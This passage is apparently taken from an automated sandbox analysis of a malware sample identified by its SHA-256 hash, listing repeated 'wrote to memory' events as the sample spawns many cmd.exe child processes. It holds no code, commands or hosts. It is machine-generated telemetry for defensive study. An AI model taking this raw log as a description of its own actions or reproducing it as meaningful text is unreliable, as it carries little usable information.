7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1116 PID 1460 wrote to memory of 1756 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1116 PID 1460 wrote to memory of 1756 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1116 PID 1756 wrote to memory of 216 1756 cmd.exe 1118 PID 1756 wrote to memory of 216 1756 cmd.exe 1118 PID 1756 wrote to memory of 216 1756 cmd.exe 1118 PID 1756 wrote to memory of 216 1756 cmd.exe 1118 PID 1756 wrote to memory of 1876 1756 cmd.exe 1119 PID 1756 wrote to memory of 1876 1756 cmd.exe 1119 PID 1756 wrote to memory of 1876 1756 cmd.exe 1119 PID 1756 wrote to memory of 1876 1756 cmd.exe 1119 PID 1756 wrote to memory of 800 1756 cmd.exe 1120 PID 1756 wrote to memory of 800 1756 cmd.exe 1120 PID 1756 wrote to memory of 800 1756 cmd.exe 1120 PID 1756 wrote to memory of 800 1756 cmd.exe 1120 PID 800 wrote to memory of 1928 800 cmd.exe 1121 PID 800 wrote to memory of 1928 800 cmd.exe 1121 PID 800 wrote to memory of 1928 800 cmd.exe 1121 PID 800 wrote to memory of 1928 800 cmd.exe 1121 PID 1756 wrote to memory of 1780 1756 cmd.exe 1122 PID 1756 wrote to memory of 1780 1756 cmd.exe 1122 PID 1756 wrote to memory of 1780 1756 cmd.exe 1122 PID 1756 wrote to memory of 1780 1756 cmd.exe 1122 PID 1460 wrote to memory of 1260 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1123 PID 1460 wrote to memory of 1260 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1123 PID 1460 wrote to memory of 1260 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1123 PID 1460 wrote to memory of 1260 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1123 PID 1260 wrote to memory of 1000 1260 cmd.exe 1125 PID 1260 wrote to memory of 1000 1260 cmd.exe 1125 PID 1260 wrote to memory of 1000 1260 cmd.exe 1125 PID 1260 wrote to memory of 1000 1260 cmd.exe 1125 PID 1260 wrote to memory of 1836 1260 cmd.exe 1126 PID 1260 wrote to memory of 1836 1260 cmd.exe 1126 PID 1260 wrote to memory of 1836 1260 cmd.exe 1126 PID 1260 wrote to memory of 1836 1260 cmd.exe 1126 PID 1260 wrote to memory of 396 1260 cmd.exe 1127 PID 1260 wrote to memory of 396 1260 cmd.exe 1127 PID 1260 wrote to memory of 396 1260 cmd.exe 1127 PID 1260 wrote to memory of 396 1260 cmd.exe 1127 PID 396 wrote to memory of 1152 396 cmd.exe 1128 PID 396 wrote to memory of 1152 396 cmd.exe 1128 PID 396 wrote to memory of 1152 396 cmd.exe 1128 PID 396 wrote to memory of 1152 396 cmd.exe 1128 PID 1260 wrote to memory of 340 1260 cmd.exe 1129 PID 1260 wrote to memory of 340 1260 cmd.exe 1129 PID 1260 wrote to memory of 340 1260 cmd.exe 1129 PID 1260 wrote to memory of 340 1260 cmd.exe 1129 PID 1460 wrote to memory of 1796 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1130 PID 1460 wrote to memory of 1796 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1130 PID 1460 wrote to memory of 1796 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1130 PID 1460 wrote to memory of 1796 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1130 PID 1796 wrote to memory of 556 1796 cmd.exe 1132 PID 1796 wrote to memory of 556 1796 cmd.exe 1132 PID 1796 wrote to memory of 556 1796 cmd.exe 1132 PID 1796 wrote to memory of 556 1796 cmd.exe 1132 PID 1796 wrote to memory of 1988 1796 cmd.exe 1133 PID 1796 wrote to memory of 1988 1796 cmd.exe 1133 PID 1796 wrote to memory of 1988 1796 cmd.exe 1133 PID 1796 wrote to memory of 1988 1796 cmd.exe 1133 PID 1796 wrote to memory of 1228 1796 cmd.exe 1134 PID 1796 wrote to memory of 1228 1796 cmd.exe 1134 PID 1796 wrote to memory of 1228 1796 cmd.exe 1134 PID 1796 wrote to memory of 1228 1796 cmd.exe 1134 PID 1228 wrote to memory of 572 1228 cmd.exe 1135 PID 1228 wrote to memory of 572 1228 cmd.exe 1135 PID 1228 wrote to memory of 572 1228 cmd.exe 1135 PID 1228 wrote to memory of 572 1228 cmd.exe 1135 PID 1796 wrote to memory of 560 1796 cmd.exe 1136 PID 1796 wrote to memory of 560 1796 cmd.exe 1136 PID 1796 wrote to memory of 560 1796 cmd.exe 1136 PID 1796 wrote to memory of 560 1796 cmd.exe 1136 PID 1460 wrote to memory of 1820 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1137 PID 1460 wrote to memory of 1820 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1137 PID 1460 wrote to memory of 1820 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1137 PID 1460 wrote to memory of 1820 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1137 PID 1820 wrote to memory of 1084 1820 cmd.exe 1139 PID 1820 wrote to memory of 1084 1820 cmd.exe 1139 PID 1820 wrote to memory of 1084 1820 cmd.exe 1139 PID 1820 wrote to memory of 1084 1820 cmd.exe 1139 PID 1820 wrote to memory of 800 1820 cmd.exe 1140 PID 1820 wrote to memory of 800 1820 cmd.exe 1140 PID 1820 wrote to memory of 800 1820 cmd.exe 1140 PID 1820 wrote to memory of 800 1820 cmd.exe 1140 PID 1820 wrote to memory of 1028 1820 cmd.exe 1141 PID 1820 wrote to memory of 1028 1820 cmd.exe 1141 PID 1820 wrote to memory of 1028 1820 cmd.exe 1141 PID 1820 wrote to memory of 1028 1820 cmd.exe 1141 PID 1028 wrote to memory of 1824 1028 cmd.exe 1142 PID 1028 wrote to memory of 1824 1028 cmd.exe 1142 PID 1028 wrote to memory of 1824 1028 cmd.exe 1142 PID 1028 wrote to memory of 1824 1028 cmd.exe 1142 PID 1820 wrote to memory of 1256 1820 cmd.exe 1143 PID 1820 wrote to memory of 1256 1820 cmd.exe 1143 PID 1820 wrote to memory of 1256 1820 cmd.exe 1143 PID 1820 wrote to memory of 1256 1820 cmd.exe 1143 PID 1460 wrote to memory of 968 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1144 PID 1460 wrote to memory of 968 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1144 PID 1460 wrote to memory of 968 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1144 PID 1460 wrote to memory of 968 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1144 PID 968 wrote to memory of 992 968 cmd.exe 1146 PID 968 wrote to memory of 992 968 cmd.exe 1146 PID 968 wrote to memory of 992 968 cmd.exe 1146 PID 968 wrote to memory of 992 968 cmd.exe 1146 PID 968 wrote to memory of 1596 968 cmd.exe 1147 PID 968 wrote to memory of 1596 968 cmd.exe 1147 PID 968 wrote to memory of 1596 968 cmd.exe 1147 PID 968 wrote to memory of 1596 968 cmd.exe 1147 PID 968 wrote to memory of 1916 968 cmd.exe 1148 PID 968 wrote to memory of 1916 968 cmd.exe 1148 PID 968 wrote to memory of 1916 968 cmd.exe 1148 PID 968 wrote to memory of 1916 968 cmd.exe 1148 PID 1916 wrote to memory of 1068 1916 cmd.exe 1149 PID 1916 wrote to memory of 1068 1916 cmd.exe 1149 PID 1916 wrote to memory of 1068 1916 cmd.exe 1149 PID 1916 wrote to memory of 1068 1916 cmd.exe 1149 PID 968 wrote to memory of 1260 968 cmd.exe 1150 PID 968 wrote to memory of 1260 968 cmd.exe 1150 PID 968 wrote to memory of 1260 968 cmd.exe 1150 PID 968 wrote to memory of 1260 968 cmd.exe 1150 PID 1460 wrote to memory of 1568 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1151 PID 1460 wrote to memory of 1568 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1151 PID 1460 wrote to memory of 1568 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1151 PID 1460 wrote to memory of 1568 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1151 PID 1568 wrote to memory of 896 1568 cmd.exe 1153 PID 1568 wrote to memory of 896 1568 cmd.exe 1153 PID 1568 wrote to memory of 896 1568 cmd.exe 1153 PID 1568 wrote to memory of 896 1568 cmd.exe 1153 PID 1568 wrote to memory of 572 1568 cmd.exe 1154 PID 1568 wrote to memory of 572 1568 cmd.exe 1154 PID 1568 wrote to memory of 572 1568 cmd.exe 1154 PID 1568 wrote to memory of 572 1568 cmd.exe 1154 PID 1568 wrote to memory of 904 1568 cmd.exe 1155 PID 1568 wrote to memory of 904 1568 cmd.exe 1155 PID 1568 wrote to memory of 904 1568 cmd.exe 1155 PID 1568 wrote to memory of 904 1568 cmd.exe 1155 PID 904 wrote to memory of 1992 904 cmd.exe 1156 PID 904 wrote to memory of 1992 904 cmd.exe 1156 PID 904 wrote to memory of 1992 904 cmd.exe 1156 PID 904 wrote to memory of 1992 904 cmd.exe 1156 PID 1568 wrote to memory of 744 1568 cmd.exe 1157 PID 1568 wrote to memory of 744 1568 cmd.exe 1157 PID 1568 wrote to memory of 744 1568 cmd.exe 1157 PID 1568 wrote to memory of 744 1568 cmd.exe 1157 PID 1460 wrote to memory of 952 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1158 PID 1460 wrote to memory of 952 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1158 PID 1460 wrote to memory of 952 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1158 PID 1460 wrote to memory of 952 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1158 PID 952 wrote to memory of 1912 952 cmd.exe 1160 PID 952 wrote to memory of 1912 952 cmd.exe 1160 PID 952 wrote to memory of 1912 952 cmd.exe 1160 PID 952 wrote to memory of 1912 952 cmd.exe 1160 PID 952 wrote to memory of 592 952 cmd.exe 1161 PID 952 wrote to memory of 592 952 cmd.exe 1161 PID 952 wrote to memory of 592 952 cmd.exe 1161 PID 952 wrote to memory of 592 952 cmd.exe 1161 PID 952 wrote to memory of 880 952 cmd.exe 1162 PID 952 wrote to memory of 880 952 cmd.exe 1162 PID 952 wrote to memory of 880 952 cmd.exe 1162 PID 952 wrote to memory of 880 952 cmd.exe 1162 PID 880 wrote to memory of 1028 880 cmd.exe 1163 PID 880 wrote to memory of 1028 880 cmd.exe 1163 PID 880 wrote to memory of 1028 880 cmd.exe 1163 PID 880 wrote to memory of 1028 880 cmd.exe 1163 PID 952 wrote to memory of 1256 952 cmd.exe 1164 PID 952 wrote to memory of 1256 952 cmd.exe 1164 PID 952 wrote to memory of 1256 952 cmd.exe 1164 PID 952 wrote to memory of 1256 952 cmd.exe 1164 PID 1460 wrote to memory of 1856 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1165 PID 1460 wrote to memory of 1856 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1165 PID 1460 wrote to memory of 1856 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1165 PID 1460 wrote to memory of 1856 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1165 PID 1856 wrote to memory of 960 1856 cmd.exe 1167 PID 1856 wrote to memory of 960 1856 cmd.exe 1167 PID 1856 wrote to memory of 960 1856 cmd.exe 1167 PID 1856 wrote to memory of 960 1856 cmd.exe 1167 PID 1856 wrote to memory of 1696 1856 cmd.exe 1168 PID 1856 wrote to memory of 1696 1856 cmd.exe 1168 PID 1856 wrote to memory of 1696 1856 cmd.exe 1168 PID 1856 wrote to memory of 1696 1856 cmd.exe 1168 PID 1856 wrote to memory of 1812 1856 cmd.exe 1169 PID 1856 wrote to memory of 1812 1856 cmd.exe 1169 PID 1856 wrote to memory of 1812 1856 cmd.exe 1169 PID 1856 wrote to memory of 1812 1856 cmd.exe 1169 PID 1812 wrote to memory of 1916 1812 cmd.exe 1170 PID 1812 wrote to memory of 1916 1812 cmd.exe 1170 PID 1812 wrote to memory of 1916 1812 cmd.exe 1170 PID 1812 wrote to memory of 1916 1812 cmd.exe 1170 PID 1856 wrote to memory of 1260 1856 cmd.exe 1171 PID 1856 wrote to memory of 1260 1856 cmd.exe 1171 PID 1856 wrote to memory of 1260 1856 cmd.exe 1171 PID 1856 wrote to memory of 1260 1856 cmd.exe 1171 PID 1460 wrote to memory of 1144 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1172 PID 1460 wrote to memory of 1144 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1172 PID 1460 wrote to memory of 1144 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1172 PID 1460 wrote to memory of 1144 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1172 PID 1144 wrote to memory of 1608 1144 cmd.exe 1174 PID 1144 wrote to memory of 1608 1144 cmd.exe 1174 PID 1144 wrote to memory of 1608 1144 cmd.exe 1174 PID 1144 wrote to memory of 1608 1144 cmd.exe 1174 PID 1144 wrote to memory of 572 1144 cmd.exe 1175 PID 1144 wrote to memory of 572 1144 cmd.exe 1175 PID 1144 wrote to memory of 572 1144 cmd.exe 1175 PID 1144 wrote to memory of 572 1144 cmd.exe 1175 PID 1144 wrote to memory of 1852 1144 cmd.exe 1176 PID 1144 wrote to memory of 1852 1144 cmd.exe 1176 PID 1144 wrote to memory of 1852 1144 cmd.exe 1176 PID 1144 wrote to memory of 1852 1144 cmd.exe 1176 PID 1852 wrote to memory of 560 1852 cmd.exe 1177 PID 1852 wrote to memory of 560 1852 cmd.exe 1177 PID 1852 wrote to memory of 560 1852 cmd.exe 1177 PID 1852 wrote to memory of 560 1852 cmd.exe 1177 PID 1144 wrote to memory of 1316 1144 cmd.exe 1178 PID 1144 wrote to memory of 1316 1144 cmd.exe 1178 PID 1144 wrote to memory of 1316 1144 cmd.exe 1178 PID 1144 wrote to memory of 1316 1144 cmd.exe 1178 PID 1460 wrote to memory of 556 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1179 PID 1460 wrote to memory of 556 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1179 PID 1460 wrote to memory of 556 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1179 PID 1460 wrote to memory of 556 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1179 PID 556 wrote to memory of 1756 556 cmd.exe 1181 PID 556 wrote to memory of 1756 556 cmd.exe 1181 PID 556 wrote to memory of 1756 556 cmd.exe 1181 PID 556 wrote to memory of 1756 556 cmd.exe 1181 PID 556 wrote to memory of 204 556 cmd.exe 1182 PID 556 wrote to memory of 204 556 cmd.exe 1182 PID 556 wrote to memory of 204 556 cmd.exe 1182 PID 556 wrote to memory of 204 556 cmd.exe 1182 PID 556 wrote to memory of 1380 556 cmd.exe 1183 PID 556 wrote to memory of 1380 556 cmd.exe 1183 PID 556 wrote to memory of 1380 556 cmd.exe 1183 PID 556 wrote to memory of 1380 556 cmd.exe 1183 PID 1380 wrote to memory of 1824 1380 cmd.exe 1184 PID 1380 wrote to memory of 1824 1380 cmd.exe 1184 PID 1380 wrote to memory of 1824 1380 cmd.exe 1184 PID 1380 wrote to memory of 1824 1380 cmd.exe 1184 PID 556 wrote to memory of 1224 556 cmd.exe 1185 PID 556 wrote to memory of 1224 556 cmd.exe 1185 PID 556 wrote to memory of 1224 556 cmd.exe 1185 PID 556 wrote to memory of 1224 556 cmd.exe 1185 PID 1460 wrote to memory of 952 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1186 PID 1460 wrote to memory of 952 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1186 PID 1460 wrote to memory of 952 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1186 PID 1460 wrote to memory of 952 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1186 PID 952 wrote to memory of 396 952 cmd.exe 1188 PID 952 wrote to memory of 396 952 cmd.exe 1188 PID 952 wrote to memory of 396 952 cmd.exe 1188 PID 952 wrote to memory of 396 952 cmd.exe 1188 PID 952 wrote to memory of 1696 952 cmd.exe 1189 PID 952 wrote to memory of 1696 952 cmd.exe 1189 PID 952 wrote to memory of 1696 952 cmd.exe 1189 PID 952 wrote to memory of 1696 952 cmd.exe 1189 PID 952 wrote to memory of 1864 952 cmd.exe 1190 PID 952 wrote to memory of 1864 952 cmd.exe 1190 PID 952 wrote to memory of 1864 952 cmd.exe 1190 PID 952 wrote to memory of 1864 952 cmd.exe 1190 PID 1864 wrote to memory of 1068 1864 cmd.exe 1191 PID 1864 wrote to memory of 1068 1864 cmd.exe 1191 PID 1864 wrote to memory of 1068 1864 cmd.exe 1191 PID 1864 wrote to memory of 1068 1864 cmd.exe 1191 PID 952 wrote to memory of 824 952 cmd.exe 1192 PID 952 wrote to memory of 824 952 cmd.exe 1192 PID 952 wrote to memory of 824 952 cmd.exe 1192 PID 952 wrote to memory of 824 952 cmd.exe 1192 PID 1460 wrote to memory of 992 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1193 PID 1460 wrote to memory of 992 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1193 PID 1460 wrote to memory of 992 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1193 PID 1460 wrote to memory of 992 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1193 PID 992 wrote to memory of 1608 992 cmd.exe 1195 PID 992 wrote to memory of 1608 992 cmd.exe 1195 PID 992 wrote to memory of 1608 992 cmd.exe 1195 PID 992 wrote to memory of 1608 992 cmd.exe 1195 PID 992 wrote to memory of 1444 992 cmd.exe 1196 PID 992 wrote to memory of 1444 992 cmd.exe 1196 PID 992 wrote to memory of 1444 992 cmd.exe 1196 PID 992 wrote to memory of 1444 992 cmd.exe 1196 PID 992 wrote to memory of 1992 992 cmd.exe 1197 PID 992 wrote to memory of 1992 992 cmd.exe 1197 PID 992 wrote to memory of 1992 992 cmd.exe 1197 PID 992 wrote to memory of 1992 992 cmd.exe 1197 PID 1992 wrote to memory of 1852 1992 cmd.exe 1198 PID 1992 wrote to memory of 1852 1992 cmd.exe 1198 PID 1992 wrote to memory of 1852 1992 cmd.exe 1198 PID 1992 wrote to memory of 1852 1992 cmd.exe 1198 PID 992 wrote to memory of 1316 992 cmd.exe 1199 PID 992 wrote to memory of 1316 992 cmd.exe 1199 PID 992 wrote to memory of 1316 992 cmd.exe 1199 PID 992 wrote to memory of 1316 992 cmd.exe 1199 PID 1460 wrote to memory of 1920 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1200 PID 1460 wrote to memory of 1920 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1200 PID 1460 wrote to memory of 1920 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1200 PID 1460 wrote to memory of 1920 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1200 PID 1920 wrote to memory of 972 1920 cmd.exe 1202 PID 1920 wrote to memory of 972 1920 cmd.exe 1202 PID 1920 wrote to memory of 972 1920 cmd.exe 1202 PID 1920 wrote to memory of 972 1920 cmd.exe 1202 PID 1920 wrote to memory of 1768 1920 cmd.exe 1203 PID 1920 wrote to memory of 1768 1920 cmd.exe 1203 PID 1920 wrote to memory of 1768 1920 cmd.exe 1203 PID 1920 wrote to memory of 1768 1920 cmd.exe 1203 PID 1920 wrote to memory of 788 1920 cmd.exe 1204 PID 1920 wrote to memory of 788 1920 cmd.exe 1204 PID 1920 wrote to memory of 788 1920 cmd.exe 1204 PID 1920 wrote to memory of 788 1920 cmd.exe 1204 PID 788 wrote to memory of 1284 788 cmd.exe 1205 PID 788 wrote to memory of 1284 788 cmd.exe 1205 PID 788 wrote to memory of 1284 788 cmd.exe 1205 PID 788 wrote to memory of 1284 788 cmd.exe 1205 PID 1920 wrote to memory of 1572 1920 cmd.exe 1206 PID 1920 wrote to memory of 1572 1920 cmd.exe 1206 PID 1920 wrote to memory of 1572 1920 cmd.exe 1206 PID 1920 wrote to memory of 1572 1920 cmd.exe 1206 PID 1460 wrote to memory of 1568 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1207 PID 1460 wrote to memory of 1568 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1207 PID 1460 wrote to memory of 1568 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1207 PID 1460 wrote to memory of 1568 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1207 PID 1568 wrote to memory of 396 1568 cmd.exe 1209 PID 1568 wrote to memory of 396 1568 cmd.exe 1209 PID 1568 wrote to memory of 396 1568 cmd.exe 1209 PID 1568 wrote to memory of 396 1568 cmd.exe 1209 PID 1568 wrote to memory of 1696 1568 cmd.exe 1210 PID 1568 wrote to memory of 1696 1568 cmd.exe 1210 PID 1568 wrote to memory of 1696 1568 cmd.exe 1210 PID 1568 wrote to memory of 1696 1568 cmd.exe 1210 PID 1568 wrote to memory of 828 1568 cmd.exe 1211 PID 1568 wrote to memory of 828 1568 cmd.exe 1211 PID 1568 wrote to memory of 828 1568 cmd.exe 1211 PID 1568 wrote to memory of 828 1568 cmd.exe 1211 PID 828 wrote to memory of 1424 828 cmd.exe 1212 PID 828 wrote to memory of 1424 828 cmd.exe 1212 PID 828 wrote to memory of 1424 828 cmd.exe 1212 PID 828 wrote to memory of 1424 828 cmd.exe 1212 PID 1568 wrote to memory of 1260 1568 cmd.exe 1213 PID 1568 wrote to memory of 1260 1568 cmd.exe 1213 PID 1568 wrote to memory of 1260 1568 cmd.exe 1213 PID 1568 wrote to memory of 1260 1568 cmd.exe 1213 PID 1460 wrote to memory of 1596 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1214 PID 1460 wrote to memory of 1596 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1214 PID 1460 wrote to memory of 1596 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1214 PID 1460 wrote to memory of 1596 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1214 PID 1596 wrote to memory of 1608 1596 cmd.exe 1216 PID 1596 wrote to memory of 1608 1596 cmd.exe 1216 PID 1596 wrote to memory of 1608 1596 cmd.exe 1216 PID 1596 wrote to memory of 1608 1596 cmd.exe 1216 PID 1596 wrote to memory of 1444 1596 cmd.exe 1217 PID 1596 wrote to memory of 1444 1596 cmd.exe 1217 PID 1596 wrote to memory of 1444 1596 cmd.exe 1217 PID 1596 wrote to memory of 1444 1596 cmd.exe 1217 PID 1596 wrote to memory of 1796 1596 cmd.exe 1218 PID 1596 wrote to memory of 1796 1596 cmd.exe 1218 PID 1596 wrote to memory of 1796 1596 cmd.exe 1218 PID 1596 wrote to memory of 1796 1596 cmd.exe 1218 PID 1796 wrote to memory of 1852 1796 cmd.exe 1219 PID 1796 wrote to memory of 1852 1796 cmd.exe 1219 PID 1796 wrote to memory of 1852 1796 cmd.exe 1219 PID 1796 wrote to memory of 1852 1796 cmd.exe 1219 PID 1596 wrote to memory of 896 1596 cmd.exe 1220 PID 1596 wrote to memory of 896 1596 cmd.exe 1220 PID 1596 wrote to memory of 896 1596 cmd.exe 1220 PID 1596 wrote to memory of 896 1596 cmd.exe 1220 PID 1460 wrote to memory of 1480 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1221 PID 1460 wrote to memory of 1480 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1221 PID 1460 wrote to memory of 1480 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1221 PID 1460 wrote to memory of 1480 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1221 PID 1480 wrote to memory of 304 1480 cmd.exe 1223 PID 1480 wrote to memory of 304 1480 cmd.exe 1223 PID 1480 wrote to memory of 304 1480 cmd.exe 1223 PID 1480 wrote to memory of 304 1480 cmd.exe 1223 PID 1480 wrote to memory of 940 1480 cmd.exe 1224 PID 1480 wrote to memory of 940 1480 cmd.exe 1224 PID 1480 wrote to memory of 940 1480 cmd.exe 1224 PID 1480 wrote to memory of 940 1480 cmd.exe 1224 PID 1480 wrote to memory of 1256 1480 cmd.exe 1225 PID 1480 wrote to memory of 1256 1480 cmd.exe 1225 PID 1480 wrote to memory of 1256 1480 cmd.exe 1225 PID 1480 wrote to memory of 1256 1480 cmd.exe 1225 PID 1256 wrote to memory of 1380 1256 cmd.exe 1226 PID 1256 wrote to memory of 1380 1256 cmd.exe 1226 PID 1256 wrote to memory of 1380 1256 cmd.exe 1226 PID 1256 wrote to memory of 1380 1256 cmd.exe 1226 PID 1480 wrote to memory of 1780 1480 cmd.exe 1227 PID 1480 wrote to memory of 1780 1480 cmd.exe 1227 PID 1480 wrote to memory of 1780 1480 cmd.exe 1227 PID 1480 wrote to memory of 1780 1480 cmd.exe 1227 PID 1460 wrote to memory of 800 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1228 PID 1460 wrote to memory of 800 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1228 PID 1460 wrote to memory of 800 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1228 PID 1460 wrote to memory of 800 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1228 PID 800 wrote to memory of 1072 800 cmd.exe 1230 PID 800 wrote to memory of 1072 800 cmd.exe 1230 PID 800 wrote to memory of 1072 800 cmd.exe 1230 PID 800 wrote to memory of 1072 800 cmd.exe 1230 PID 800 wrote to memory of 1000 800 cmd.exe 1231 PID 800 wrote to memory of 1000 800 cmd.exe 1231 PID 800 wrote to memory of 1000 800 cmd.exe 1231 PID 800 wrote to memory of 1000 800 cmd.exe 1231 PID 800 wrote to memory of 1068 800 cmd.exe 1232 PID 800 wrote to memory of 1068 800 cmd.exe 1232 PID 800 wrote to memory of 1068 800 cmd.exe 1232 PID 800 wrote to memory of 1068 800 cmd.exe 1232 PID 1068 wrote to memory of 1856 1068 cmd.exe 1233 PID 1068 wrote to memory of 1856 1068 cmd.exe 1233 PID 1068 wrote to memory of 1856 1068 cmd.exe 1233 PID 1068 wrote to memory of 1856 1068 cmd.exe 1233 PID 800 wrote to memory of 1516 800 cmd.exe 1234 PID 800 wrote to memory of 1516 800 cmd.exe 1234 PID 800 wrote to memory of 1516 800 cmd.exe 1234 PID 800 wrote to memory of 1516 800 cmd.exe 1234 PID 1460 wrote to memory of 1908 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1235 PID 1460 wrote to memory of 1908 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1235 PID 1460 wrote to memory of 1908 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1235 PID 1460 wrote to memory of 1908 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1235 PID 1908 wrote to memory of 1876 1908 cmd.exe 1237 PID 1908 wrote to memory of 1876 1908 cmd.exe 1237 PID 1908 wrote to memory of 1876 1908 cmd.exe 1237 PID 1908 wrote to memory of 1876 1908 cmd.exe 1237 PID 1908 wrote to memory of 780 1908 cmd.exe 1238 PID 1908 wrote to memory of 780 1908 cmd.exe 1238 PID 1908 wrote to memory of 780 1908 cmd.exe 1238 PID 1908 wrote to memory of 780 1908 cmd.exe 1238 PID 1908 wrote to memory of 744 1908 cmd.exe 1239 PID 1908 wrote to memory of 744 1908 cmd.exe 1239 PID 1908 wrote to memory of 744 1908 cmd.exe 1239 PID 1908 wrote to memory of 744 1908 cmd.exe 1239 PID 744 wrote to memory of 560 